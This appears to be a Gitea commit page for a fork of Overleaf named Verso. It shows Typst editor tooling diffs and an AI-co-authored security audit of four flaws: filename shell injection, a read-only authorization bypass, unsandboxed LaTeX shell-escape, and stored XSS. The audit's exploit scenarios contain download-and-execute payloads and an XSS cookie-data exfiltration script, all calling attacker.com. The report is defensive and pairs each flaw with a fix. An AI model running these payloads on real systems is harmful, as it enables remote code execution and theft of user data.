11 Commits

Author SHA1 Message Date
claude 952c897760 docs: add alpha-3 security audit report
Four findings: shell injection via filename (RCE on CLSI), auth bypass
on publish-presentation routes, shell-escape without sandbox in prod,
and stored XSS via published presentations (CSP removed on main origin).

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-06-19 10:10:19 +00:00
alois 713aa70c52 Actualiser issues3.png 2026-06-09 07:25:39 +00:00
alois 3e0188b66d Téléverser les fichiers vers "/" 2026-06-09 07:25:13 +00:00
claude 8c9a610f0d tools: add Typst bold/italic parse-tree diagnostic script
Paste typst-bold-italic-diag.js into the browser console while a Typst
document containing *bold* and _italic_ is open to determine whether
Strong/Emphasis nodes are being produced by the grammar (grammar issue)
or whether the nodes exist but bold/italic is not visually rendered
(font issue — Source Code Pro only loads Regular 400).

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-06-08 22:02:14 +00:00
alois 6496e9133d Actualiser issues2.png 2026-06-08 21:22:11 +00:00
alois 5fcf4bb262 Téléverser les fichiers vers "/" 2026-06-08 21:21:48 +00:00
alois 8e6e9eded0 Actualiser issues.png 2026-06-08 20:45:03 +00:00
alois 33c830b594 Téléverser les fichiers vers "issue.png" 2026-06-08 20:44:27 +00:00
claude f36dbd12e9 chore: rewrite diagnostic — CSS class counts + cm-content view accessor 2026-06-08 19:35:02 +00:00
claude c65bb80512 chore: fix CodeMirror view accessor in diagnostic script 2026-06-08 19:29:49 +00:00
claude 031f65224c chore: add browser diagnostic script for Typst highlighting 2026-06-08 19:29:49 +00:00
38 changed files with 532 additions and 648 deletions
+43
View File
@@ -0,0 +1,43 @@
/**
* Typst syntax highlighting diagnostics.
* Paste into browser dev tools console with a Typst file open.
*/
// ── Part 1: CSS token counts (no view needed) ────────────────────────────
// If all are 0, the language mode is not being applied at all.
console.log('=== Token CSS class counts ===')
;['heading','comment','keyword','string','number',
'variableName','function','emphasis','strong'].forEach(t => {
const n = document.querySelectorAll('.tok-' + t).length
console.log(` .tok-${t}: ${n}`)
})
// ── Part 2: Try to get the parse tree ────────────────────────────────────
// CodeMirror 6 stores DocView on .cm-content; DocView.view = EditorView
const content = document.querySelector('.cm-content')
const view = content?.cmView?.view
if (!view?.state) {
console.warn('Could not find EditorView — parse tree unavailable')
console.log('Keys on .cm-content:', Object.keys(content ?? {}).join(', '))
} else {
console.log('\n=== Parse tree (top 600 chars) ===')
console.log(view.state.tree.toString().slice(0, 600))
// First heading line
const doc = view.state.doc
for (let ln = 1; ln <= Math.min(doc.lines, 25); ln++) {
const line = doc.line(ln)
if (line.text.trimStart().startsWith('=')) {
console.log(`\n=== Nodes on heading line ${ln}: "${line.text}" ===`)
view.state.tree.iterate({
from: line.from, to: line.to,
enter(node) {
const t = doc.sliceString(node.from, node.to)
console.log(` ${node.name}: ${JSON.stringify(t.slice(0, 50))}`)
}
})
break
}
}
}
+259
View File
@@ -0,0 +1,259 @@
# Verso Alpha-3 Security Audit
**Date:** 2026-06-19
**Branch audited:** `main` (full codebase)
**Method:** multi-agent automated review + manual false-positive filtering
---
## Summary
| # | Title | Severity | Confidence |
|---|-------|----------|------------|
| 1 | Shell injection via filename → RCE on CLSI | **HIGH** | 9/10 |
| 2 | Read-only collaborator can publish / unpublish / rotate tokens | **HIGH** | 9/10 |
| 3 | LaTeX `shell-escape` enabled without sandbox in production | **HIGH** | 9/10 |
| 4 | Published presentations served without CSP (stored XSS on origin) | **MEDIUM** | 9/10 |
---
## Vuln 1 — Command Injection via Filename → RCE on CLSI
**Files:**
- `services/clsi/app/js/QuartoRunner.js` (lines 102147)
- `services/clsi/app/js/TypstRunner.js` (lines 139141, 399400)
**Category:** `command_injection` / `rce`
**Severity:** HIGH | **Confidence:** 9/10
### Description
`renderTarget` / `mainFile` (the project's root resource path) is interpolated directly into a shell command string passed to `/bin/sh -c` without any quoting or escaping:
```js
// QuartoRunner.js ~line 102
const baseName = renderTarget.replace(/\.[^/.]+$/, '')
// …passed to /bin/sh -c:
`quarto render $COMPILE_DIR/${renderTarget} 2>&1 && mv ${baseName}.pdf output.pdf`
`; rm -rf ${baseName}.qmd ${baseName}_files`
```
```js
// TypstRunner.js ~line 140 — double quotes do NOT prevent $() or backtick expansion
['/bin/sh', '-c', `typst watch "${absInput}" "${absOutput}" 2>&1`]
// TypstRunner.js ~line 399 — completely unquoted
['/bin/sh', '-c', `typst compile $COMPILE_DIR/${mainFile} output.pdf 2>&1`]
```
`SafePath.isCleanFilename()` (`SafePath.mjs` lines 2437) only blocks `/`, `\`, `*`, and control characters. Shell metacharacters — `$`, `` ` ``, `(`, `)`, `;`, `&`, `|` — all pass through unchecked. The CLSI's own `_checkPath()` only rejects `..` path traversal.
### Exploit Scenario
Any project collaborator renames their root file to:
```
foo$(curl https://attacker.com/shell.sh|sh).qmd
```
Triggering a compile executes the injected command unsandboxed inside the CLSI container as the host process user.
### Fix
Use an args array instead of `/bin/sh -c` with a concatenated string:
```js
// Instead of:
spawn('/bin/sh', ['-c', `quarto render ${renderTarget} ...`])
// Use:
spawn('quarto', ['render', absRenderTarget, '--to', 'pdf'])
```
For cases where a shell string is unavoidable, single-quote the variable: `'${renderTarget}'` (single quotes prevent all shell expansion). The safest fix is removing all three `/bin/sh -c templateString` invocations in favour of direct `spawn` with an explicit args array.
---
## Vuln 2 — Authorization Bypass: Read-Only Collaborators Can Publish / Unpublish / Rotate Tokens
**File:** `services/web/app/src/router.mjs` (lines 697710)
**Category:** `authorization_bypass` / `privilege_escalation`
**Severity:** HIGH | **Confidence:** 9/10
### Description
Three destructive presentation endpoints are gated on `ensureUserCanReadProject` instead of `ensureUserCanAdminProject`:
```js
webRouter.post('/project/:Project_id/publish-presentation',
AuthorizationMiddleware.ensureUserCanReadProject, // ← should be ensureUserCanAdminProject
PublishedPresentationController.publish)
webRouter.post('/project/:Project_id/publish-presentation/regenerate',
AuthorizationMiddleware.ensureUserCanReadProject, // ← should be ensureUserCanAdminProject
PublishedPresentationController.regenerate)
webRouter.delete('/project/:Project_id/publish-presentation',
AuthorizationMiddleware.ensureUserCanReadProject, // ← should be ensureUserCanAdminProject
PublishedPresentationController.unpublish)
```
`canUserReadProject` returns `true` for the `READ_ONLY` privilege level (`AuthorizationManager.mjs` lines 260276), which is granted to any read-only collaborator and to anonymous users holding a read-only token link. `canUserAdminProject` requires `OWNER` only.
### Exploit Scenario
User A shares a project read-only with User B. User B can:
1. **`DELETE /publish-presentation`** — permanently take down the owner's published presentation
2. **`POST /publish-presentation/regenerate`** — rotate the public/login/member share token, breaking all existing links
3. **`POST /publish-presentation`** — force a recompile and overwrite the published snapshot
### Fix
```js
// Change all three routes — replace:
AuthorizationMiddleware.ensureUserCanReadProject
// with:
AuthorizationMiddleware.ensureUserCanAdminProject
```
One-line fix per route. This is the highest-priority fix because it requires no architectural change.
---
## Vuln 3 — LaTeX `shell-escape` Enabled Without Sandbox in Production (RCE)
**Files:**
- `.gitea/workflows/deploy-verso-prod.yml` (lines 332333)
- `services/clsi/app/js/LatexRunner.js` (lines 200202)
- `services/clsi/app/js/CommandRunner.js` (lines 1216)
**Category:** `rce` / `insecure_configuration`
**Severity:** HIGH | **Confidence:** 9/10
### Description
The production Kubernetes deployment sets `OVERLEAF_LATEX_SHELL_ESCAPE: "true"` with neither `SANDBOXED_COMPILES` nor `DOCKER_RUNNER` configured. This passes `-shell-escape` to every latexmk invocation globally, for all users, with no per-user or per-project gating:
```js
// LatexRunner.js lines 200202
if (Settings.clsi?.latexShellEscape) {
command.push('-shell-escape') // unconditional — applies to all users/projects
}
```
Without `DOCKER_RUNNER=true`, `CommandRunner.js` selects `LocalCommandRunner` — compiles run as the host process with full container filesystem access. The reference `docker-compose.yml` *does* configure sandboxed compiles (`SANDBOXED_COMPILES: true`, `DOCKER_RUNNER: true`); the production K8s deployment simply omits them.
The compile endpoint requires only `ensureUserCanReadProject`, so any holder of a read-only share link can trigger a compile.
### Exploit Scenario
Any user with read-only access to any project uploads or edits a `.tex` file containing:
```latex
\immediate\write18{curl https://attacker.com/shell.sh | bash}
```
Triggering a compile executes the command unsandboxed, with access to all mounted volumes (source files, Redis socket, compile output).
### Fix (two steps)
**Step 1 — Short term:** Remove `OVERLEAF_LATEX_SHELL_ESCAPE: "true"` from `.gitea/workflows/deploy-verso-prod.yml`. Disable shell-escape entirely unless there is a specific, per-project need.
**Step 2 — Medium term:** Add sandboxed compile configuration to the production deployment, mirroring the reference `docker-compose.yml`:
```yaml
- name: SANDBOXED_COMPILES
value: "true"
- name: DOCKER_RUNNER
value: "true"
```
This contains the blast radius of any future compile-path vulnerability regardless of shell-escape status.
---
## Vuln 4 — Stored XSS via Published Presentations (CSP Removed on Main Origin)
**File:** `services/web/app/src/Features/PublishedPresentation/PublishedPresentationController.mjs` (line 116)
**Category:** `xss` / `stored`
**Severity:** MEDIUM | **Confidence:** 9/10
### Description
The published-presentation handler explicitly removes the Content-Security-Policy header before serving the raw HTML output:
```js
res.removeHeader('Content-Security-Policy') // line 116
res.sendFile(target, ...) // serves output.html / index.html directly
```
The file served is the raw Quarto/reveal.js compile output — not a sanitized template. Since users control the `.qmd` source entirely, arbitrary `<script>` blocks can be embedded. The `/p/:token` routes are registered on the same `webRouter` as the main app, so scripts execute with **full same-origin privileges** against the Verso application origin.
### Impact
- Any visitor to a `publicToken` link has the script execute in their browser (no login required to be targeted)
- `fetch()` calls from the same origin automatically include the session cookie, bypassing `httpOnly`
- A script can call the `/dev/csrf` endpoint to obtain a valid CSRF token, then call any mutating POST/DELETE API endpoint as the victim (read/write projects, change email, delete account, exfiltrate documents)
### Exploit Scenario
1. Attacker creates a Quarto project with a slide containing:
```html
<script>
fetch('/user/settings', {credentials: 'include'})
.then(r => r.json())
.then(d => fetch('https://attacker.com/?d=' + btoa(JSON.stringify(d))))
</script>
```
2. Compiles and publishes → obtains the `publicToken` URL
3. Shares the link with a victim
4. Victim visits the link → script executes on the Verso origin → authenticated API calls made on victim's behalf
### Fix
The correct fix is to **serve published presentations from an isolated subdomain** (e.g., `decks.verso.example.com`) with no session cookie access, so embedded scripts are origin-isolated from the main app.
As a stopgap, apply a restricted CSP instead of removing it entirely:
```js
// Instead of:
res.removeHeader('Content-Security-Policy')
// Apply a presentation-specific policy:
res.setHeader('Content-Security-Policy',
"default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; connect-src 'none'")
```
`connect-src 'none'` blocks `fetch()`/XHR exfiltration even if inline scripts run.
---
## Items Reviewed and Not Flagged
| Area | Finding |
|------|---------|
| MongoDB queries | No raw `req.body` interpolation; Mongoose used throughout |
| CSRF protection | `csurf` middleware applied globally; no Verso-added bypass found |
| `dangerouslySetInnerHTML` | Only in operator-controlled footer (env-var source, not user input) |
| `DOMPurify` usage | `labs-description.tsx` uses it correctly with a strict allowlist |
| Hardcoded credentials | `dev.env` has weak defaults; production uses auto-generated secrets from `100_generate_secrets.sh` |
| Open redirects | `getSafeRedirectPath` strips to pathname only; no exploitable chain found |
| SSRF (URL agent) | Proxied through `linkedUrlProxy`; host allowlisting in place |
| Path traversal in `serve()` | `path.resolve` + `startsWith` guard is correct |
| Session secret | Auto-generated at init, stored in `/etc/container_environment/CRYPTO_RANDOM` |
---
## Recommended Fix Priority for Alpha-3
| Priority | Finding | Effort |
|----------|---------|--------|
| 1 | **Vuln 2** — wrong auth middleware on 3 routes | ~5 min, 3-line fix |
| 2 | **Vuln 3** — remove `shell-escape` from prod deploy | ~5 min, remove 2 lines from YAML |
| 3 | **Vuln 1** — fix quoting in QuartoRunner + TypstRunner | ~1 hour, refactor spawn calls |
| 4 | **Vuln 4** — XSS via presentations | Hoursdays; subdomain isolation is the real fix |
Vulns 13 are straightforward enough to fix before shipping alpha-3. Vuln 4 can be mitigated with the `connect-src 'none'` CSP header as a stopgap and tracked as a post-alpha-3 architectural item.
BIN
View File
Binary file not shown.

After

Width:  |  Height:  |  Size: 88 KiB

BIN
View File
Binary file not shown.

After

Width:  |  Height:  |  Size: 95 KiB

BIN
View File
Binary file not shown.

After

Width:  |  Height:  |  Size: 102 KiB

+3 -2
View File
@@ -26,12 +26,13 @@ cypress/results/
# Ace themes for conversion
frontend/js/features/source-editor/themes/ace/
# Compiled parser files (latex/bibtex are generated by webpack plugin at build time)
# Compiled parser files
frontend/js/features/source-editor/lezer-latex/latex.mjs
frontend/js/features/source-editor/lezer-latex/latex.terms.mjs
frontend/js/features/source-editor/lezer-bibtex/bibtex.mjs
frontend/js/features/source-editor/lezer-bibtex/bibtex.terms.mjs
# typst compiled files are committed (generated via node scripts/lezer-latex/generate.mjs)
frontend/js/features/source-editor/lezer-typst/typst.mjs
frontend/js/features/source-editor/lezer-typst/typst.terms.mjs
!**/fixtures/**/*.log
@@ -1,7 +1,6 @@
import { pipeline } from 'node:stream/promises'
import Metrics from '@overleaf/metrics'
import ProjectGetter from '../Project/ProjectGetter.mjs'
import { Project } from '../../models/Project.mjs'
import CompileManager from './CompileManager.mjs'
import ClsiManager from './ClsiManager.mjs'
import logger from '@overleaf/logger'
@@ -9,7 +8,6 @@ import Settings from '@overleaf/settings'
import Errors from '../Errors/Errors.js'
import SessionManager from '../Authentication/SessionManager.mjs'
import { userCanInstallPython } from './PythonVenvGate.mjs'
import TokenAccessHandler from '../TokenAccess/TokenAccessHandler.mjs'
import { RateLimiter } from '../../infrastructure/RateLimiter.mjs'
import Validation from '../../infrastructure/Validation.mjs'
import Path from 'node:path'
@@ -207,8 +205,7 @@ const _CompileController = {
// Allow building a per-project Python venv from requirements.txt only for
// the project owner and invited collaborators — never anonymous or
// link-sharing users.
const anonToken = TokenAccessHandler.getRequestToken(req, projectId)
options.allowPythonInstall = await userCanInstallPython(userId, projectId, anonToken)
options.allowPythonInstall = await userCanInstallPython(userId, projectId)
let {
enablePdfCaching,
@@ -303,26 +300,6 @@ const _CompileController = {
? getOutputFilesArchiveSpecification(projectId, userId, buildId)
: null
// Persist quarto output flavor so the project-list badge can distinguish
// RevealJS presentations from PDF documents without needing a compile.
// options.compiler is not sent by the frontend, so we read the stored
// compiler from the DB. Done fire-and-forget so it never delays the response.
if (status === 'success') {
const isHtml = outputFiles.some(f => f.path === 'output.html')
ProjectGetter.promises
.getProject(projectId, { compiler: 1 })
.then(project => {
if (project?.compiler !== 'quarto') return
return Project.updateOne(
{ _id: projectId },
{ quartoFlavor: isHtml ? 'revealjs' : 'pdf' }
).exec()
})
.catch(err =>
logger.warn({ err, projectId }, 'failed to update quartoFlavor')
)
}
res.json({
status,
outputFiles,
@@ -4,12 +4,11 @@ import AuthorizationManager from '../Authorization/AuthorizationManager.mjs'
// Whether this user may have the compiler install a project's requirements.txt
// into a cached venv (so Quarto's Python cells can use libraries beyond the
// bundled base set). Allowed for any user who can access the project owner,
// invited collaborators, token-link users, and public-project readers — since
// the set of packages to install is already controlled by requirements.vrf
// (writable only by project members with write access). Returns false when the
// feature is disabled, the privilege check fails, or the user has no access.
export async function userCanInstallPython(userId, projectId, token = null) {
// bundled base set). Gated to the project owner + invited collaborators (any
// role): ignorePublicAccess excludes link-sharing/public and anonymous users,
// who fall back to the base Python interpreter. Returns false when the feature
// is disabled or the privilege check fails.
export async function userCanInstallPython(userId, projectId) {
if (!Settings.enableProjectPythonVenv) {
return false
}
@@ -18,7 +17,8 @@ export async function userCanInstallPython(userId, projectId, token = null) {
await AuthorizationManager.promises.getPrivilegeLevelForProject(
userId,
projectId,
token
null,
{ ignorePublicAccess: true }
)
return Boolean(privilegeLevel)
} catch (err) {
@@ -681,7 +681,7 @@ async function _getProjects(
const results = await Promise.all([
ProjectGetter.promises.findAllUsersProjects(
userId,
'name lastUpdated lastUpdatedBy publicAccesLevel archived trashed owner_ref tokens compiler quartoFlavor'
'name lastUpdated lastUpdatedBy publicAccesLevel archived trashed owner_ref tokens compiler'
),
TagsHandler.promises.getAllTags(userId),
])
@@ -826,7 +826,6 @@ function _formatProjectInfo(project, accessLevel, source, userId) {
archived,
trashed,
compiler: project.compiler,
quartoFlavor: project.quartoFlavor,
}
}
@@ -881,7 +880,6 @@ async function _injectProjectUsers(projects) {
: users[project.owner_ref.toString()],
owner_ref: undefined,
compiler: project.compiler,
quartoFlavor: project.quartoFlavor,
}))
}
-1
View File
@@ -38,7 +38,6 @@ export const ProjectSchema = new Schema(
version: { type: Number }, // incremented for every change in the project structure (folders and filenames)
publicAccesLevel: { type: String, default: 'private' },
compiler: { type: String, default: settings.defaultLatexCompiler },
quartoFlavor: { type: String, enum: ['revealjs', 'pdf'] },
spellCheckLanguage: { type: String, default: 'en' },
deletedByExternalDataSource: { type: Boolean, default: false },
description: { type: String, default: '' },
@@ -8,7 +8,6 @@ import { usePermissionsContext } from '@/features/ide-react/context/permissions-
import FileTreeActionButton from './file-tree-action-button'
import { useRailContext } from '../../ide-react/context/rail-context'
import PythonRequirementsModal from './python-requirements-modal'
import { useProjectSettingsContext } from '@/features/editor-left-menu/context/project-settings-context'
export default function FileTreeActionButtons({
fileTreeExpanded,
@@ -20,8 +19,6 @@ export default function FileTreeActionButtons({
const { write } = usePermissionsContext()
const { handlePaneCollapse } = useRailContext()
const [showPythonModal, setShowPythonModal] = useState(false)
const { compiler } = useProjectSettingsContext()
const isQuarto = compiler === 'quarto'
const {
canCreate,
@@ -115,7 +112,7 @@ export default function FileTreeActionButtons({
iconType="delete"
/>
)}
{write && isQuarto && (
{write && (
<FileTreeActionButton
id="python-packages"
description={t('python_packages')}
@@ -4,21 +4,12 @@ import { ProjectCompiler } from '../../../../../../../types/project-settings'
// Map the stored compiler engine to the document format the project produces.
// CLSI dispatches the real engine from the root file's extension, but the
// compiler field is a faithful, cheap proxy for the project's format.
function formatLabel(
compiler: ProjectCompiler | undefined,
quartoFlavor: 'revealjs' | 'pdf' | undefined
): {
function formatLabel(compiler: ProjectCompiler | undefined): {
label: string
variant: 'quarto-slides' | 'quarto' | 'typst' | 'latex'
variant: 'quarto' | 'typst' | 'latex'
} {
switch (compiler) {
case 'quarto':
if (quartoFlavor === 'revealjs') {
return { label: 'Quarto Slides', variant: 'quarto-slides' }
}
if (quartoFlavor === 'pdf') {
return { label: 'Quarto PDF', variant: 'quarto' }
}
return { label: 'Quarto', variant: 'quarto' }
case 'typst':
return { label: 'Typst', variant: 'typst' }
@@ -33,7 +24,7 @@ type FormatCellProps = {
}
export default function FormatCell({ project }: FormatCellProps) {
const { label, variant } = formatLabel(project.compiler, project.quartoFlavor)
const { label, variant } = formatLabel(project.compiler)
return (
<span
@@ -46,6 +46,5 @@ export const classHighlighter = tagHighlighter([
{ tag: tags.invalid, class: 'tok-invalid' },
{ tag: tags.punctuation, class: 'tok-punctuation' },
// additional
{ tag: tags.attributeName, class: 'tok-attributeName' },
{ tag: tags.attributeValue, class: 'tok-attributeValue' },
])
@@ -203,9 +203,6 @@ const staticTheme = EditorView.theme({
alignItems: 'center',
fontWeight: 'normal',
},
// Bold and italic markup (e.g. *strong* _emphasis_ in Typst and Markdown)
'.tok-strong': { fontWeight: 'bold' },
'.tok-emphasis': { fontStyle: 'italic' },
'.cm-selectionLayer': {
zIndex: -10,
},
@@ -23,53 +23,32 @@ const LEVELS: NestingLevel[] = [
// after it, so this stays clear of code.
const HEADING_REGEX = /^(=+)[ \t]+(.*\S)[ \t]*$/
// Count unescaped '$' signs on a line to track math-mode parity.
function countDollars(text: string): number {
let count = 0
for (let i = 0; i < text.length; i++) {
if (text[i] === '\\') { i++; continue }
if (text[i] === '$') count++
}
return count
}
function computeOutline(
state: EditorState
): ProjectionResult<FlatOutlineItem> {
const items: FlatOutlineItem[] = []
// Track whether we are inside a multi-line display math block.
// Each line with an odd number of unescaped '$' toggles the flag.
let inMath = false
for (let n = 1; n <= state.doc.lines; n++) {
const line = state.doc.line(n)
const text = line.text
const match = HEADING_REGEX.exec(line.text)
if (!match) continue
// Only attempt heading detection when not inside a math block.
// (e.g. '= b+c$' on the second line of '$ a \n= b+c$' must be skipped.)
if (!inMath) {
const match = HEADING_REGEX.exec(text)
if (match) {
const depth = match[1].length
const level = LEVELS[Math.min(depth, LEVELS.length) - 1]
// Strip a trailing line comment, then a trailing label.
const title = match[2]
.replace(/\s*\/\/.*$/, '')
.replace(/\s*<[\w-]+>\s*$/, '')
.trim()
const depth = match[1].length
const level = LEVELS[Math.min(depth, LEVELS.length) - 1]
// Strip a trailing line comment, then a trailing label.
const title = match[2]
.replace(/\s*\/\/.*$/, '')
.replace(/\s*<[\w-]+>\s*$/, '')
.trim()
items.push({
line: n,
toLine: n,
title,
from: line.from,
to: line.to,
level,
} as FlatOutlineItem)
}
}
if (countDollars(text) % 2 === 1) inMath = !inMath
items.push({
line: n,
toLine: n,
title,
from: line.from,
to: line.to,
level,
} as FlatOutlineItem)
}
return { items, status: ProjectionStatus.Complete }
@@ -14,8 +14,9 @@ import { typstDocumentOutline } from './document-outline'
// Note on tree structure: rules starting with a lowercase letter in the grammar
// are inline (no tree node), so their children are promoted to the parent.
// E.g. codeArgItem, codeValue, callSuffix, codeArgList are all inline.
// Named arg keys emit CodeArgKey (not CodeIdent) via codeIdentTokenizer,
// so CodeArgKey appears at the same level as other codeArgItem children.
// Therefore:
// - The named-argument key "CodeIdent" is a *direct* child of CodeArgs.
// - Positional arguments that are identifiers are wrapped in CallExpr.
export const TypstLanguage = LRLanguage.define({
name: 'typst',
@@ -49,13 +50,11 @@ export const TypstLanguage = LRLanguage.define({
CodeBool: t.atom,
// Identifiers:
// CodeExpr/CodeIdent — bare #func (no args) → function style
// FuncExpr/CodeIdent — func call with args/method (#func(...), link.with(url)) → function style
// CodeArgKey — named arg key (tokenizer pre-disambiguates on ':') → attributeName
// CodeIdent — plain variable/constant reference (e.g. 'left', 'center') → variable
'CodeExpr/CodeIdent': t.function(t.variableName),
'FuncExpr/CodeIdent': t.function(t.variableName),
CodeArgKey: t.attributeName,
// - direct child of CallExpr → function/method name
// - direct child of CodeArgs → named argument key (key: value syntax)
// - everywhere else → plain variable
'CallExpr/CodeIdent': t.function(t.variableName),
'CodeArgs/CodeIdent': t.attributeName,
CodeIdent: t.variableName,
// Literals in code mode
@@ -74,11 +73,8 @@ export const TypstLanguage = LRLanguage.define({
MathContent: t.string,
// Markup emphasis
'Strong/"*" Strong/StrongBody': t.strong,
'Emphasis/"_" Emphasis/EmphBody': t.emphasis,
// Bare URLs (https://... / http://...)
URL: t.string,
'Strong/"*" Strong/StrongText': t.strong,
'Emphasis/"_" Emphasis/EmphText': t.emphasis,
// Labels (<name>) and references (@name)
'Label/"<" Label/">" Label/LabelName': t.labelName,
@@ -101,9 +97,6 @@ const typstHighlightStyle = HighlightStyle.define([
{ tag: t.heading, fontWeight: 'bold' },
{ tag: t.strong, fontWeight: 'bold' },
{ tag: t.emphasis, fontStyle: 'italic' },
// Named arg keys (fill:, caption:, columns:…) — amber colour that reads
// well on both light and dark backgrounds, independent of theme CSS.
{ tag: t.attributeName, color: '#c47900' },
])
export const typst = () => {
@@ -8,50 +8,22 @@ import {
RawBlockBody,
RawBlockClose,
RawInlineContent,
CodeBlockBody,
BlockCommentBody,
LineCommentContent,
MathContent,
CodeKeyword,
CodeIdent,
CodeArgKey,
StrongBody,
EmphBody,
} from './typst.terms.mjs'
const BACKTICK = 96 // `
const SLASH = 47 // /
const STAR = 42 // *
const NEWLINE = 10 // \n
const EQUALS = 61 // =
const SPACE = 32 //
const TAB = 9 // \t
const DOLLAR = 36 // $
const BACKTICK = 96 // `
const SLASH = 47 // /
const STAR = 42 // *
const NEWLINE = 10 // \n
const EQUALS = 61 // =
const SPACE = 32 //
const TAB = 9 // \t
const DOLLAR = 36 // $
const OPEN_BRACE = 123 // {
const CLOSE_BRACE = 125 // }
const HASH = 35 // #
const UNDERSCORE = 95 // _
const DOT = 46 // .
const OPEN_PAREN = 40 // (
const COMMA = 44 // ,
const COLON = 58 // :
const SEMICOLON = 59 // ;
const OPEN_ANGLE = 60 // <
const CLOSE_ANGLE = 62 // >
const PLUS = 43 // +
const KEYWORDS = new Set([
'let', 'set', 'show', 'import', 'include',
'if', 'else', 'for', 'while', 'return',
'break', 'continue', 'in', 'as',
'and', 'or', 'not', 'context',
])
const BOOLS = new Set(['true', 'false', 'none', 'auto'])
const isAlpha = ch => (ch >= 65 && ch <= 90) || (ch >= 97 && ch <= 122)
const isDigit = ch => ch >= 48 && ch <= 57
const isIdentHead = ch => isAlpha(ch) || ch === UNDERSCORE
const isIdentTail = ch => isAlpha(ch) || isDigit(ch) || ch === UNDERSCORE || ch === 45
// ── headingTokenizer ────────────────────────────────────────────────────
// Emits HeadingMark — the "=+" prefix plus the trailing whitespace.
@@ -90,17 +62,6 @@ export const headingTitleTokenizer = new ExternalTokenizer(
while (input.next !== -1 && input.next !== NEWLINE) {
if (input.next === SLASH &&
(input.peek(1) === SLASH || input.peek(1) === STAR)) break
// Stop before a trailing '<label>' so it is parsed as a Label node
// rather than being merged into the heading title text.
// Only stops when '<' is immediately followed by a valid label name and '>'.
if (input.next === OPEN_ANGLE) {
const ch = input.peek(1)
if (isAlpha(ch) || isDigit(ch) || ch === UNDERSCORE) {
let j = 2
while (isIdentTail(input.peek(j)) || input.peek(j) === DOT || input.peek(j) === COLON) j++
if (input.peek(j) === CLOSE_ANGLE) break
}
}
input.advance()
hasContent = true
}
@@ -144,20 +105,6 @@ export const rawTokenizer = new ExternalTokenizer(
}
if (stack.canShift(RawBlockBody)) {
// Guard: must genuinely follow a RawBlockOpen (which ends with \n).
// Walk backward past any lang tag (A-Za-z0-9) and require ```.
// This blocks spurious LALR-merged states from consuming body text.
if (input.peek(-1) !== NEWLINE) return
let back = -2
while (
(input.peek(back) >= 65 && input.peek(back) <= 90) ||
(input.peek(back) >= 97 && input.peek(back) <= 122) ||
(input.peek(back) >= 48 && input.peek(back) <= 57)
) { back-- }
if (input.peek(back) !== BACKTICK ||
input.peek(back - 1) !== BACKTICK ||
input.peek(back - 2) !== BACKTICK) return
let hasContent = false
while (input.next !== -1) {
if (
@@ -189,6 +136,36 @@ export const rawInlineTokenizer = new ExternalTokenizer(
{ contextual: false }
)
// ── codeBlockTokenizer ──────────────────────────────────────────────────
// Emits CodeBlockBody — the interior of a #{ ... } code block.
// Tracks brace nesting depth so that inner braces (e.g. #{ f({ x }) })
// are included in the body rather than closing the outer block.
export const codeBlockTokenizer = new ExternalTokenizer(
(input, _stack) => {
// The opening '{' has already been consumed by the grammar rule.
let depth = 1
let hasContent = false
while (input.next !== -1) {
const ch = input.next
if (ch === OPEN_BRACE) {
depth++
input.advance()
hasContent = true
} else if (ch === CLOSE_BRACE) {
if (depth === 1) break // leave this '}' for the grammar rule
depth--
input.advance()
hasContent = true
} else {
input.advance()
hasContent = true
}
}
if (hasContent) input.acceptToken(CodeBlockBody)
},
{ contextual: false }
)
// ── blockCommentTokenizer ───────────────────────────────────────────────
// Emits BlockCommentBody — the interior of a /* ... */ comment.
// Typst supports nested block comments (/* /* inner */ outer */), so this
@@ -238,13 +215,9 @@ export const lineCommentContentTokenizer = new ExternalTokenizer(
)
// ── mathContentTokenizer ────────────────────────────────────────────────
// Emits MathContent — one line of content between the $...$ delimiters.
// Stops at '$' or '\n' so each token is bounded to a single line.
//
// The grammar uses MathContent* (not MathContent?) so multi-line display
// math ($ ... \n ... $) is handled by multiple MathContent tokens, one per
// line, with @skip consuming the newlines in between. This keeps each
// token short and prevents a stray '$' from consuming the whole document.
// Emits MathContent — everything between the $...$ delimiters (no newlines).
// External rather than a @tokens rule for the same reason as LineCommentContent:
// ![$\n]+ overlaps with spaces, '<', '@', and other literals in merged states.
export const mathContentTokenizer = new ExternalTokenizer(
(input, _stack) => {
let hasContent = false
@@ -256,174 +229,3 @@ export const mathContentTokenizer = new ExternalTokenizer(
},
{ contextual: false }
)
// ── codeKeywordTokenizer ─────────────────────────────────────────────────
// Emits CodeKeyword (let, set, for, while, in, …) ONLY when the preceding
// character is '#', i.e. we are immediately after the '#' sigil in a CodeExpr.
//
// The peek(-1)==='#' guard is what prevents LALR state-merging from causing
// these tokens to fire in body-text positions. Common English words like
// "in", "for", "while", "return" appear in markup paragraphs; without the
// guard they would be highlighted as keywords due to LALR-merged states where
// CodeKeyword is technically in the valid set.
export const codeKeywordTokenizer = new ExternalTokenizer(
(input, stack) => {
if (!stack.canShift(CodeKeyword)) return
// Valid positions: after '#', ':', '{' (code block start), or ';'.
// Walk back past optional whitespace.
let back = -1
while (input.peek(back) === SPACE || input.peek(back) === TAB || input.peek(back) === NEWLINE) back--
const kwPrev = input.peek(back)
if (kwPrev !== HASH && kwPrev !== COLON && kwPrev !== OPEN_BRACE && kwPrev !== SEMICOLON) return
// Peek ahead to read the full identifier without advancing.
let len = 0
while (true) {
const ch = input.peek(len)
if (isIdentHead(ch) || (len > 0 && isIdentTail(ch))) { len++ } else { break }
}
if (len === 0) return
const chars = []
for (let i = 0; i < len; i++) chars.push(input.peek(i))
const word = String.fromCharCode(...chars)
if (!KEYWORDS.has(word)) return
for (let i = 0; i < len; i++) input.advance()
input.acceptToken(CodeKeyword)
},
{ contextual: true }
)
// ── codeIdentTokenizer ───────────────────────────────────────────────────
// Emits CodeIdent — identifier tokens inside code expressions (#ident,
// #func(args), #obj.method, etc.).
//
// Moving CodeIdent from @tokens to an external tokenizer allows a
// character-level guard: we only emit when the preceding non-whitespace
// character is one of '#', '.', '(', ',' — genuine code-context positions.
// This stops the token from firing in markup body text where LALR-merged
// states would otherwise cause '_italic_' to be consumed as one big
// CodeIdent (since '_' is a valid identHead) instead of opening Emphasis.
//
// Keywords and bools are excluded so codeKeywordTokenizer / CodeBool can
// handle them without conflict.
//
// The backward scan runs BEFORE any canShift gate. canShift(CodeArgKey) is
// unreliable (LALR state merging can suppress it even at genuine arg-key
